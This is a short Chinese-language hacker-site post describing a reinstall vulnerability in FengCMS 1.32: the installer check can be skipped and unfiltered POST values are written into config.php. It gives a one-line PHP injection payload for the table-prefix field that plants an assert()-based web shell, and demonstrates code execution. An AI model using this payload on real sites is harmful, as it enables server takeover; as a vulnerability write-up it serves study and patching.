[WEB]FengCMS1.32系统重装漏洞导致getshell - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

[WEB]FengCMS1.32系统重装漏洞导致getshell

admin 漏洞预警
作者:only-wait (红客帝国)

请尊重版权,盗版死全家


进入./install/index.php文件

1.png

2.png

3.png

可以看到这里判断./upload/INSTALL文件是否存在,若存在,就弹出JavaScript代码。但是这里我们可以完全忽视javascript代码,即可进入下一步。
接着看看./install/install.php文件

4.png

5.png

6.png

7.png


这个文件入之后会判断config.php文件是否可写,接着对传入的post值并无任何过滤
跟进config.php文件

8.png

在表名前缀处构造Pyload:

1
f_');assert($_REQUEST["w"]);//

我们就这样完美构造出了pyload

1498027082259654.jpg

1498027127194870.jpg


1.jpg

2.jpg


安装完成过后再看看config.php文件


3.png


在主页直接执行phpinfo()函数,效果如下

4.jpg


标签: 暂无标签

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表